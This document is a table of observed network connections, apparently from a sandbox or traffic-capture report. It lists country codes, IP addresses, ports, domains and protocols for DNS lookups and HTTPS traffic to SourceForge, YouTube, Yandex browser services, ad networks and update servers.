| GB | 216.58.201.110:443 | youtube-ui.l.google.com | udp |
| AU | 1.0.0.1:53 | consent.youtube.com | udp |
| US | 1.1.1.1:53 | googleads.g.doubleclick.net | udp |
| AU | 1.0.0.1:53 | googleads.g.doubleclick.net | udp |
| GB | 142.250.179.226:443 | googleads.g.doubleclick.net | tcp |
| US | 1.1.1.1:53 | googleads.g.doubleclick.net | udp |
| AU | 1.0.0.1:53 | googleads.g.doubleclick.net | udp |
| US | 1.1.1.1:53 | googleads.g.doubleclick.net | udp |
| AU | 1.0.0.1:53 | 1.178.250.142.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | googleads.g.doubleclick.net | udp |
| US | 1.1.1.1:53 | e212585.b.akamaiedge.net | udp |
| GB | 142.250.179.226:443 | googleads.g.doubleclick.net | udp |
| AU | 1.0.0.1:53 | e212585.b.akamaiedge.net | udp |
| US | 1.1.1.1:53 | 226.179.250.142.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 226.179.250.142.in-addr.arpa | udp |
| US | 1.1.1.1:53 | cachev2-fra-02.cdn.yandex.net | udp |
| AU | 1.0.0.1:53 | cachev2-fra-02.cdn.yandex.net | udp |
| DE | 5.45.200.105:443 | cachev2-fra-02.cdn.yandex.net | tcp |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| US | 104.18.40.209:443 | a.fsdn.com.cdn.cloudflare.net | tcp |
| GB | 2.18.63.60:443 | ipv6.6sc.co | tcp |
| US | 1.1.1.1:53 | d.delivery.consentmanager.net | udp |
| US | 1.1.1.1:53 | e212585.b.akamaiedge.net | udp |
| US | 1.1.1.1:53 | sourceforge.net | udp |
| AU | 1.0.0.1:53 | e212585.b.akamaiedge.net | udp |
| AU | 1.0.0.1:53 | d.delivery.consentmanager.net | udp |
| AU | 1.0.0.1:53 | sourceforge.net | udp |
| US | 1.1.1.1:53 | 105.200.45.5.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 105.200.45.5.in-addr.arpa | udp |
| GB | 2.18.63.60:443 | ipv6.6sc.co | tcp |
| US | 1.1.1.1:53 | f9728fe5a774f75f65aade907580ce4f.safeframe.googlesyndication.com | udp |
| AU | 1.0.0.1:53 | f9728fe5a774f75f65aade907580ce4f.safeframe.googlesyndication.com | udp |
| GB | 216.58.204.65:443 | f9728fe5a774f75f65aade907580ce4f.safeframe.googlesyndication.com | tcp |
| US | 130.211.23.194:443 | api.btloader.com | udp |
| US | 1.1.1.1:53 | ml314.com | udp |
| US | 1.1.1.1:53 | analytics.slashdotmedia.com | udp |
| AU | 1.0.0.1:53 | analytics.slashdotmedia.com | udp |
| AU | 1.0.0.1:53 | ml314.com | udp |
| RU | 213.180.193.234:443 | api.browser.yandex.net | tcp |
| RU | 213.180.193.234:443 | api.browser.yandex.net | tcp |
| US | 1.1.1.1:53 | sourceforge.net | udp |
| AU | 1.0.0.1:53 | sourceforge.net | udp |
| US | 1.1.1.1:53 | sourceforge.net | udp |
| US | 1.1.1.1:53 | cdfb5adad0cf8c61e87267ea6b0cb9be.safeframe.googlesyndication.com | udp |
| AU | 1.0.0.1:53 | cdfb5adad0cf8c61e87267ea6b0cb9be.safeframe.googlesyndication.com | udp |
| GB | 172.217.169.33:443 | cdfb5adad0cf8c61e87267ea6b0cb9be.safeframe.googlesyndication.com | tcp |
| US | 1.1.1.1:53 | crl.comodoca.com | udp |
| US | 104.18.38.233:80 | crl.comodoca.com | tcp |
| GB | 172.217.169.33:443 | cdfb5adad0cf8c61e87267ea6b0cb9be.safeframe.googlesyndication.com | udp |
| FI | 5.45.192.12:443 | cachev2-rad-05.cdn.yandex.net | tcp |
| RU | 213.180.193.234:443 | api.browser.yandex.net | tcp |
| US | 1.1.1.1:53 | 33.169.217.172.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 23.149.64.172.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 33.169.217.172.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 23.149.64.172.in-addr.arpa | udp |
| GB | 142.250.178.1:443 | cdn.ampproject.org | tcp |
| US | 1.1.1.1:53 | cachev2-ams15.cdn.yandex.net | udp |
| US | 1.1.1.1:53 | e212585.b.akamaiedge.net | udp |
| AU | 1.0.0.1:53 | cachev2-ams15.cdn.yandex.net | udp |
| NL | 5.45.247.11:443 | cachev2-ams15.cdn.yandex.net | tcp |
| AU | 1.0.0.1:53 | e212585.b.akamaiedge.net | udp |
| US | 1.1.1.1:53 | e212585.b.akamaiedge.net | udp |
| AU | 1.0.0.1:53 | e212585.b.akamaiedge.net | udp |
| US | 1.1.1.1:53 | cachev2-ams20.cdn.yandex.net | udp |
| AU | 1.0.0.1:53 | cachev2-ams20.cdn.yandex.net | udp |
| NL | 5.45.247.21:443 | cachev2-ams20.cdn.yandex.net | tcp |
| US | 1.1.1.1:53 | 11.247.45.5.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 11.247.45.5.in-addr.arpa | udp |
| RU | 213.180.193.234:443 | api.browser.yandex.net | tcp |
| US | 1.1.1.1:53 | cachev2-rad-04.cdn.yandex.net | udp |
| AU | 1.0.0.1:53 | cachev2-rad-04.cdn.yandex.net | udp |
| FI | 5.45.192.10:443 | cachev2-rad-04.cdn.yandex.net | tcp |
| US | 1.1.1.1:53 | 21.247.45.5.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 21.247.45.5.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 10.192.45.5.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 10.192.45.5.in-addr.arpa | udp |
| US | 1.1.1.1:53 | cachev2-ams02.cdn.yandex.net | udp |
| AU | 1.0.0.1:53 | cachev2-ams02.cdn.yandex.net | udp |
| NL | 5.45.247.52:443 | cachev2-ams02.cdn.yandex.net | tcp |
| US | 1.1.1.1:53 | 52.247.45.5.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 52.247.45.5.in-addr.arpa | udp |
| US | 1.1.1.1:53 | downloads.sourceforge.net | udp |
| AU | 1.0.0.1:53 | downloads.sourceforge.net | udp |
| US | 204.68.111.105:443 | downloads.sourceforge.net | tcp |
| US | 1.1.1.1:53 | downloads.sourceforge.net | udp |
| AU | 1.0.0.1:53 | downloads.sourceforge.net | udp |
| US | 1.1.1.1:53 | downloads.sourceforge.net | udp |
| AU | 1.0.0.1:53 | downloads.sourceforge.net | udp |
| US | 1.1.1.1:53 | 105.111.68.204.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 105.111.68.204.in-addr.arpa | udp |
| US | 1.1.1.1:53 | deac-riga.dl.sourceforge.net | udp |
| AU | 1.0.0.1:53 | deac-riga.dl.sourceforge.net | udp |
| LV | 89.111.52.100:443 | deac-riga.dl.sourceforge.net | tcp |
| US | 1.1.1.1:53 | deac-riga.dl.sourceforge.net | udp |
| AU | 1.0.0.1:53 | deac-riga.dl.sourceforge.net | udp |
| US | 1.1.1.1:53 | deac-riga.dl.sourceforge.net | udp |
| AU | 1.0.0.1:53 | deac-riga.dl.sourceforge.net | udp |
| US | 1.1.1.1:53 | 100.52.111.89.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 100.52.111.89.in-addr.arpa | udp |
| US | 1.1.1.1:53 | obseu.bizseasky.com | udp |
| AU | 1.0.0.1:53 | obseu.bizseasky.com | udp |
| US | 1.1.1.1:53 | obseu.bizseasky.com | udp |
| AU | 1.0.0.1:53 | obseu.bizseasky.com | udp |
| US | 1.1.1.1:53 | obseu.bizseasky.com | udp |
| AU | 1.0.0.1:53 | obseu.bizseasky.com | udp |
| GB | 51.140.242.104:443 | nav.smartscreen.microsoft.com | tcp |
| RU | 213.180.193.234:443 | api.browser.yandex.net | tcp |
| US | 1.1.1.1:53 | checkappexec.microsoft.com | udp |
| RU | 213.180.193.234:443 | api.browser.yandex.net | tcp |
| GB | 172.165.69.228:443 | checkappexec.microsoft.com | tcp |
| US | 1.1.1.1:53 | cdn.consentmanager.net | udp |
| US | 1.1.1.1:53 | j.6sc.co | udp |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| US | 34.117.77.79:443 | ml314.com | tcp |
| US | 1.1.1.1:53 | ml314.com | udp |
| US | 1.1.1.1:53 | b.6sc.co | udp |
| GB | 2.18.63.60:443 | j.6sc.co | tcp |
| AU | 1.0.0.1:53 | cdn.consentmanager.net | udp |
| AU | 1.0.0.1:53 | j.6sc.co | udp |
| AU | 1.0.0.1:53 | b.6sc.co | udp |
| AU | 1.0.0.1:53 | ml314.com | udp |
| US | 1.1.1.1:53 | 1376624012.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | e212585.b.akamaiedge.net | udp |
| AU | 1.0.0.1:53 | 1376624012.rsc.cdn77.org | udp |
| AU | 1.0.0.1:53 | e212585.b.akamaiedge.net | udp |
| US | 1.1.1.1:53 | e212585.b.akamaiedge.net | udp |
| US | 1.1.1.1:53 | 1376624012.rsc.cdn77.org | udp |
| RU | 213.180.193.234:443 | api.browser.yandex.net | tcp |
| AU | 1.0.0.1:53 | 1376624012.rsc.cdn77.org | udp |
| RU | 213.180.193.234:443 | api.browser.yandex.net | tcp |
| US | 1.1.1.1:53 | sourceforge.net | udp |
| US | 1.1.1.1:53 | b.6sc.co | udp |
| US | 1.1.1.1:53 | d.delivery.consentmanager.net | udp |
| AU | 1.0.0.1:53 | d.delivery.consentmanager.net | udp |
| AU | 1.0.0.1:53 | b.6sc.co | udp |
| AU | 1.0.0.1:53 | sourceforge.net | udp |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| US | 104.18.33.97:443 | c.sf-syn.com | udp |
| US | 216.105.38.9:443 | analytics.slashdotmedia.com | tcp |
| US | 216.105.38.9:443 | analytics.slashdotmedia.com | tcp |
| US | 216.105.38.9:443 | analytics.slashdotmedia.com | tcp |
| US | 1.1.1.1:53 | c.6sc.co | udp |
| GB | 2.18.63.60:443 | c.6sc.co | tcp |
| US | 1.1.1.1:53 | ipv6.6sc.co | udp |
| AU | 1.0.0.1:53 | c.6sc.co | udp |
| AU | 1.0.0.1:53 | ipv6.6sc.co | udp |
| US | 1.1.1.1:53 | e212585.dscb.akamaiedge.net | udp |
| US | 1.1.1.1:53 | e212585.dscb.akamaiedge.net | udp |
| DE | 3.124.210.90:443 | ps.eyeota.net | tcp |
| NL | 185.89.210.212:443 | ib.anycast.adnxs.com | tcp |
| AU | 1.0.0.1:53 | e212585.dscb.akamaiedge.net | udp |
| US | 1.1.1.1:53 | ps.eyeota.net | udp |
| US | 1.1.1.1:53 | ps.eyeota.net | udp |
| US | 1.1.1.1:53 | 30b4e3a0884a7dac3df5780b29bbf0c1.safeframe.googlesyndication.com | udp |
| GB | 216.58.201.97:443 | 30b4e3a0884a7dac3df5780b29bbf0c1.safeframe.googlesyndication.com | tcp |
| US | 1.1.1.1:53 | pagead-googlehosted.l.google.com | udp |
| AU | 1.0.0.1:53 | pagead-googlehosted.l.google.com | udp |
| US | 1.1.1.1:53 | update.googleapis.com | udp |
| US | 1.1.1.1:53 | update.googleapis.com | udp |
| US | 1.1.1.1:53 | sba.yandex.net | udp |
| US | 1.1.1.1:53 | sba.yandex.net | udp |
| US | 1.1.1.1:53 | api.browser.yandex.ru | udp |
| US | 1.1.1.1:53 | api.browser.yandex.ru | udp |
| GB | 216.58.201.97:443 | 30b4e3a0884a7dac3df5780b29bbf0c1.safeframe.googlesyndication.com | udp |
| RU | 87.250.251.232:443 | sba.yandex.net | tcp |
| GB | 142.250.200.3:443 | update.googleapis.com | tcp |
| RU | 213.180.193.234:443 | api.browser.yandex.ru | tcp |
| AU | 1.0.0.1:53 | pagead2.googlesyndication.com | udp |
| US | 1.1.1.1:53 | sovetnik.market.yandex.ru | udp |
| US | 1.1.1.1:53 | sovetnik.market.yandex.ru | udp |
| US | 1.1.1.1:53 | browser.yandex.ru | udp |
| US | 1.1.1.1:53 | browser.yandex.ru | udp |
| US | 1.1.1.1:53 | browser-resources.s3.yandex.net | udp |
| US | 1.1.1.1:53 | browser-resources.s3.yandex.net | udp |
| US | 1.1.1.1:53 | neuro.translate.yandex.ru | udp |
| US | 1.1.1.1:53 | neuro.translate.yandex.ru | udp |
| US | 1.1.1.1:53 | 300.ya.ru | udp |
| US | 1.1.1.1:53 | 300.ya.ru | udp |
| US | 1.1.1.1:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 232.251.250.87.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 123.35.104.34.in-addr.arpa | udp |
| RU | 87.250.250.41:443 | sovetnik.market.yandex.ru | tcp |
| RU | 87.250.251.20:443 | neuro.translate.yandex.ru | tcp |
| RU | 93.158.134.158:443 | browser-resources.s3.yandex.net | tcp |
| RU | 93.158.134.158:443 | browser-resources.s3.yandex.net | tcp |
| RU | 93.158.134.158:443 | browser-resources.s3.yandex.net | tcp |
| RU | 93.158.134.121:443 | 300.ya.ru | tcp |
| RU | 93.158.134.121:443 | 300.ya.ru | tcp |
| AU | 1.0.0.1:53 | 232.251.250.87.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 123.35.104.34.in-addr.arpa | udp |
| GB | 142.250.178.1:443 | cdn.ampproject.org | udp |
| US | 1.1.1.1:53 | 41.250.250.87.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 20.251.250.87.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 41.250.250.87.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 20.251.250.87.in-addr.arpa | udp |
| US | 1.1.1.1:53 | api.browser.yandex.net | udp |
| US | 1.1.1.1:53 | api.browser.yandex.net | udp |
| RU | 87.250.251.232:443 | sba.yandex.net | tcp |
| RU | 93.158.134.121:443 | 300.ya.ru | tcp |
| US | 1.1.1.1:53 | storage.ape.yandex.net | udp |
| AU | 1.0.0.1:53 | storage.ape.yandex.net | udp |
| RU | 87.250.251.66:443 | storage.ape.yandex.net | tcp |
| RU | 5.255.255.77:443 | yandex.ru | tcp |
| US | 1.1.1.1:53 | 66.251.250.87.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 66.251.250.87.in-addr.arpa | udp |
| US | 1.1.1.1:53 | chrome.cloudflare-dns.com | udp |
| US | 1.1.1.1:53 | chrome.cloudflare-dns.com | udp |
| US | 1.1.1.1:53 | chrome.cloudflare-dns.com | udp |
| US | 1.1.1.1:53 | chrome.cloudflare-dns.com | udp |
| US | 1.1.1.1:53 | chrome.cloudflare-dns.com | udp |
| US | 1.1.1.1:53 | chrome.cloudflare-dns.com | udp |
| US | 172.64.41.3:443 | chrome.cloudflare-dns.com | udp |
| US | 172.64.41.3:443 | chrome.cloudflare-dns.com | udp |
| US | 172.64.41.3:443 | chrome.cloudflare-dns.com | tcp |
| US | 172.64.41.3:443 | chrome.cloudflare-dns.com | tcp |
| US | 162.159.61.3:443 | chrome.cloudflare-dns.com | udp |
| US | 162.159.61.3:443 | chrome.cloudflare-dns.com | tcp |
| US | 172.64.41.3:443 | chrome.cloudflare-dns.com | tcp |
| US | 1.1.1.1:53 | 3.41.64.172.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 3.61.159.162.in-addr.arpa | udp |
| US | 162.159.61.3:443 | chrome.cloudflare-dns.com | tcp |
| AU | 1.0.0.1:53 | 3.61.159.162.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 3.41.64.172.in-addr.arpa | udp |
| US | 172.64.41.3:443 | chrome.cloudflare-dns.com | tcp |
| US | 172.64.41.3:443 | chrome.cloudflare-dns.com | tcp |
| US | 172.64.41.3:443 | chrome.cloudflare-dns.com | tcp |
| US | 162.159.61.3:443 | chrome.cloudflare-dns.com | tcp |
| US | 1.1.1.1:53 | e212585.b.akamaiedge.net | udp |
| AU | 1.0.0.1:53 | e212585.b.akamaiedge.net | udp |
| US | 1.1.1.1:53 | e212585.b.akamaiedge.net | udp |
| US | 172.64.41.3:443 | chrome.cloudflare-dns.com | tcp |
| US | 172.64.41.3:443 | chrome.cloudflare-dns.com | tcp |
| US | 172.64.41.3:443 | chrome.cloudflare-dns.com | udp |
| US | 162.159.61.3:443 | chrome.cloudflare-dns.com | tcp |
| US | 162.159.61.3:443 | chrome.cloudflare-dns.com | udp |
| US | 172.64.41.3:443 | chrome.cloudflare-dns.com | tcp |
| US | 172.64.41.3:443 | chrome.cloudflare-dns.com | udp |
| US | 172.64.41.3:443 | chrome.cloudflare-dns.com | tcp |
| US | 162.159.61.3:443 | chrome.cloudflare-dns.com | tcp |
| US | 1.1.1.1:53 | cdn.consentmanager.net | udp |
| US | 1.1.1.1:53 | e212585.b.akamaiedge.net | udp |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| US | 1.1.1.1:53 | sourceforge.net | udp |
| US | 1.1.1.1:53 | 1376624012.rsc.cdn77.org | udp |
| AU | 1.0.0.1:53 | sourceforge.net | udp |
| AU | 1.0.0.1:53 | 1376624012.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1376624012.rsc.cdn77.org | udp |
| AU | 1.0.0.1:53 | 1376624012.rsc.cdn77.org | udp |
| DE | 87.230.98.76:443 | d.delivery.consentmanager.net | tcp |
| US | 1.1.1.1:53 | b.clarity.ms | udp |
| AU | 1.0.0.1:53 | b.clarity.ms | udp |
| US | 1.1.1.1:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| US | 4.153.129.168:443 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | tcp |
| AU | 1.0.0.1:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| US | 1.1.1.1:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| AU | 1.0.0.1:53 | vmss-clarity-ingest-eus2.eastus2.cloudapp.azure.com | udp |
| US | 216.105.38.9:443 | analytics.slashdotmedia.com | tcp |
| GB | 2.18.63.60:443 | e212585.dscb.akamaiedge.net | tcp |
| US | 1.1.1.1:53 | idsync.rlcdn.com | udp |
| US | 1.1.1.1:53 | ps.eyeota.net | udp |
| US | 1.1.1.1:53 | api.btloader.com | udp |
| AU | 1.0.0.1:53 | idsync.rlcdn.com | udp |
| AU | 1.0.0.1:53 | ps.eyeota.net | udp |
| AU | 1.0.0.1:53 | api.btloader.com | udp |
| US | 1.1.1.1:53 | idsync.rlcdn.com | udp |
| US | 1.1.1.1:53 | ps.eyeota.net | udp |
| US | 1.1.1.1:53 | api.btloader.com | udp |
| AU | 1.0.0.1:53 | idsync.rlcdn.com | udp |
| AU | 1.0.0.1:53 | ps.eyeota.net | udp |
| AU | 1.0.0.1:53 | api.btloader.com | udp |
| US | 1.1.1.1:53 | idsync.rlcdn.com | udp |
| AU | 1.0.0.1:53 | idsync.rlcdn.com | udp |
| NL | 185.89.210.212:443 | ib.anycast.adnxs.com | tcp |
| DE | 3.124.210.90:443 | ps.eyeota.net | tcp |
| US | 172.64.41.3:443 | chrome.cloudflare-dns.com | tcp |
| US | 172.64.41.3:443 | chrome.cloudflare-dns.com | udp |
| US | 172.64.41.3:443 | chrome.cloudflare-dns.com | tcp |
| US | 172.64.41.3:443 | chrome.cloudflare-dns.com | udp |
| US | 162.159.61.3:443 | chrome.cloudflare-dns.com | tcp |
| US | 162.159.61.3:443 | chrome.cloudflare-dns.com | udp |
| US | 1.1.1.1:53 | 574144aa3d448b4dbd75ae4c619060e3.safeframe.googlesyndication.com | udp |
| AU | 1.0.0.1:53 | 574144aa3d448b4dbd75ae4c619060e3.safeframe.googlesyndication.com | udp |
| GB | 216.58.204.65:443 | 574144aa3d448b4dbd75ae4c619060e3.safeframe.googlesyndication.com | tcp |
| GB | 216.58.204.65:443 | 574144aa3d448b4dbd75ae4c619060e3.safeframe.googlesyndication.com | udp |
| US | 1.1.1.1:53 | b.6sc.co | udp |
| US | 1.1.1.1:53 | e212585.b.akamaiedge.net | udp |
| AU | 1.0.0.1:53 | e212585.b.akamaiedge.net | udp |
| US | 1.1.1.1:53 | e212585.b.akamaiedge.net | udp |
| AU | 1.0.0.1:53 | e212585.b.akamaiedge.net | udp |
| US | 1.1.1.1:53 | i.ytimg.com | udp |
| GB | 216.58.204.86:443 | i.ytimg.com | udp |
| AU | 1.0.0.1:53 | i.ytimg.com | udp |
| US | 1.1.1.1:53 | youtube-ui.l.google.com | udp |
| GB | 172.217.169.78:443 | youtube-ui.l.google.com | udp |
| AU | 1.0.0.1:53 | youtube-ui.l.google.com | udp |
| GB | 172.217.169.65:443 | cdn.ampproject.org | udp |
| GB | 216.58.201.110:443 | youtube-ui.l.google.com | udp |
| GB | 142.250.200.14:443 | fundingchoicesmessages.google.com | udp |
| GB | 216.58.204.86:443 | i.ytimg.com | tcp |
| GB | 142.250.200.14:443 | fundingchoicesmessages.google.com | udp |
| US | 1.1.1.1:53 | rr5---sn-aigl6n6s.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr5---sn-aigl6n6s.googlevideo.com | udp |
| GB | 173.194.3.74:443 | rr5---sn-aigl6n6s.googlevideo.com | tcp |
| GB | 173.194.3.74:443 | rr5---sn-aigl6n6s.googlevideo.com | tcp |
| US | 1.1.1.1:53 | rr5.sn-aigl6n6s.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr5.sn-aigl6n6s.googlevideo.com | udp |
| US | 1.1.1.1:53 | rr5.sn-aigl6n6s.googlevideo.com | udp |
| GB | 173.194.3.74:443 | rr5.sn-aigl6n6s.googlevideo.com | udp |
| US | 1.1.1.1:53 | 67.204.58.216.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 74.3.194.173.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 74.3.194.173.in-addr.arpa | udp |
| US | 1.1.1.1:53 | rr2---sn-aigzrn76.googlevideo.com | udp |
| GB | 142.250.187.193:443 | cdn-content.ampproject.org | udp |
| US | 1.1.1.1:53 | rr2---sn-aigl6nze.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr2---sn-aigzrn76.googlevideo.com | udp |
| GB | 173.194.137.71:443 | rr2---sn-aigzrn76.googlevideo.com | tcp |
| US | 1.1.1.1:53 | rr2.sn-aigzrn76.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr2---sn-aigl6nze.googlevideo.com | udp |
| GB | 74.125.168.135:443 | rr2---sn-aigl6nze.googlevideo.com | tcp |
| US | 1.1.1.1:53 | rr2.sn-aigl6nze.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr2.sn-aigzrn76.googlevideo.com | udp |
| US | 1.1.1.1:53 | rr2.sn-aigzrn76.googlevideo.com | udp |
| US | 1.1.1.1:53 | rr2.sn-aigl6nze.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr2.sn-aigzrn76.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr2.sn-aigl6nze.googlevideo.com | udp |
| GB | 173.194.137.71:443 | rr2.sn-aigzrn76.googlevideo.com | udp |
| GB | 74.125.168.135:443 | rr2.sn-aigl6nze.googlevideo.com | udp |
| GB | 142.250.179.226:443 | googleads.g.doubleclick.net | tcp |
| US | 1.1.1.1:53 | 71.137.194.173.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 135.168.125.74.in-addr.arpa | udp |
| GB | 142.250.179.226:443 | googleads.g.doubleclick.net | udp |
| US | 1.1.1.1:53 | rr3---sn-5hnednss.googlevideo.com | udp |
| AU | 1.0.0.1:53 | 135.168.125.74.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | rr3---sn-5hnednss.googlevideo.com | udp |
| NL | 172.217.132.200:443 | rr3---sn-5hnednss.googlevideo.com | tcp |
| US | 1.1.1.1:53 | rr3.sn-5hnednss.googlevideo.com | udp |
| NL | 172.217.132.200:443 | rr3.sn-5hnednss.googlevideo.com | tcp |
| AU | 1.0.0.1:53 | rr3.sn-5hnednss.googlevideo.com | udp |
| US | 1.1.1.1:53 | rr3.sn-5hnednss.googlevideo.com | udp |
| US | 1.1.1.1:53 | rr3---sn-5hnednss.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr3---sn-5hnednss.googlevideo.com | udp |
| NL | 172.217.132.200:443 | rr3---sn-5hnednss.googlevideo.com | tcp |
| NL | 172.217.132.200:443 | rr3---sn-5hnednss.googlevideo.com | tcp |
| NL | 172.217.132.200:443 | rr3---sn-5hnednss.googlevideo.com | tcp |
| NL | 172.217.132.200:443 | rr3---sn-5hnednss.googlevideo.com | tcp |
| US | 1.1.1.1:53 | jnn-pa.googleapis.com | udp |
| US | 1.1.1.1:53 | static.doubleclick.net | udp |
| AU | 1.0.0.1:53 | jnn-pa.googleapis.com | udp |
| AU | 1.0.0.1:53 | static.doubleclick.net | udp |
| US | 1.1.1.1:53 | jnn-pa.googleapis.com | udp |
| GB | 172.217.169.42:443 | jnn-pa.googleapis.com | udp |
| GB | 142.250.187.230:443 | static.doubleclick.net | tcp |
| US | 1.1.1.1:53 | static.doubleclick.net | udp |
| AU | 1.0.0.1:53 | jnn-pa.googleapis.com | udp |
| AU | 1.0.0.1:53 | static.doubleclick.net | udp |
| US | 1.1.1.1:53 | 200.132.217.172.in-addr.arpa | udp |
| US | 1.1.1.1:53 | 42.169.217.172.in-addr.arpa | udp |
| US | 1.1.1.1:53 | static.doubleclick.net | udp |
| AU | 1.0.0.1:53 | 200.132.217.172.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | static.doubleclick.net | udp |
| GB | 142.250.187.230:443 | static.doubleclick.net | udp |
| US | 1.1.1.1:53 | play.google.com | udp |
| AU | 1.0.0.1:53 | play.google.com | udp |
| US | 1.1.1.1:53 | ade.googlesyndication.com | udp |
| AU | 1.0.0.1:53 | ad.doubleclick.net | udp |
| AU | 1.0.0.1:53 | ade.googlesyndication.com | udp |
| AU | 1.0.0.1:53 | ad.doubleclick.net | udp |
| GB | 216.58.204.66:443 | ade.googlesyndication.com | tcp |
| US | 1.1.1.1:53 | ade.googlesyndication.com | udp |
| GB | 216.58.204.86:443 | i.ytimg.com | tcp |
| AU | 1.0.0.1:53 | ade.googlesyndication.com | udp |
| US | 1.1.1.1:53 | ade.googlesyndication.com | udp |
| GB | 216.58.201.100:443 | www.google.com | udp |
| AU | 1.0.0.1:53 | ade.googlesyndication.com | udp |
| GB | 216.58.204.86:443 | i.ytimg.com | udp |
| GB | 216.58.204.66:443 | ade.googlesyndication.com | udp |
| US | 1.1.1.1:53 | 230.187.250.142.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 230.187.250.142.in-addr.arpa | udp |
| US | 1.1.1.1:53 | youtube.com | udp |
| AU | 1.0.0.1:53 | youtube.com | udp |
| US | 1.1.1.1:53 | 46.169.217.172.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 46.169.217.172.in-addr.arpa | udp |
| US | 1.1.1.1:53 | rr4---sn-aigzrnsr.googlevideo.com | udp |
| GB | 216.58.204.86:443 | i.ytimg.com | udp |
| AU | 1.0.0.1:53 | rr4---sn-aigzrnsr.googlevideo.com | udp |
| GB | 74.125.175.41:443 | rr4---sn-aigzrnsr.googlevideo.com | tcp |
| US | 1.1.1.1:53 | rr4.sn-aigzrnsr.googlevideo.com | udp |
| AU | 1.0.0.1:53 | rr4.sn-aigzrnsr.googlevideo.com | udp |
| US | 1.1.1.1:53 | rr4.sn-aigzrnsr.googlevideo.com | udp |
| GB | 74.125.175.41:443 | rr4.sn-aigzrnsr.googlevideo.com | udp |
| US | 1.1.1.1:53 | 41.175.125.74.in-addr.arpa | udp |
| AU | 1.0.0.1:53 | 41.175.125.74.in-addr.arpa | udp |
| US | 1.1.1.1:53 | youtube-ui.l.google.com | udp |
| AU | 1.0.0.1:53 | youtube-ui.l.google.com | udp |
| US | 1.1.1.1:53 | b.6sc.co | udp |
| AU | 1.0.0.1:53 | b.6sc.co | udp |
| US | 1.1.1.1:53 | e212585.b.akamaiedge.net | udp |
| AU | 1.0.0.1:53 | e212585.b.akamaiedge.net | udp |
| US | 1.1.1.1:53 | e212585.b.akamaiedge.net | udp |
| AU | 1.0.0.1:53 | e212585.b.akamaiedge.net | udp |
| US | 1.1.1.1:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| AU | 1.0.0.1:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 1.1.1.1:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| AU | 1.0.0.1:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| AU | 1.0.0.1:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 1.1.1.1:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| AU | 1.0.0.1:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 1.1.1.1:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| AU | 1.0.0.1:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 34.117.77.79:443 | ml314.com | udp |
| US | 34.117.77.79:443 | ml314.com | tcp |
| US | 1.1.1.1:53 | suggestqueries-clients6.youtube.com | udp |
| AU | 1.0.0.1:53 | suggestqueries-clients6.youtube.com | udp |
| GB | 172.217.16.238:443 | suggestqueries-clients6.youtube.com | tcp |
| GB | 172.217.16.238:443 | suggestqueries-clients6.youtube.com | tcp |
| US | 1.1.1.1:53 | suggestqueries-clients6.youtube.com | udp |
| GB | 173.194.137.71:443 | rr2.sn-aigzrn76.googlevideo.com | udp |
| US | 1.1.1.1:53 | suggestqueries-clients6.youtube.com | udp |
| AU | 1.0.0.1:53 | suggestqueries-clients6.youtube.com | udp |
| GB | 172.217.16.238:443 | suggestqueries-clients6.youtube.com | udp |
| GB | 172.217.169.78:443 | youtube-ui.l.google.com | udp |
| GB | 2.18.66.72:443 | e212585.b.akamaiedge.net | tcp |
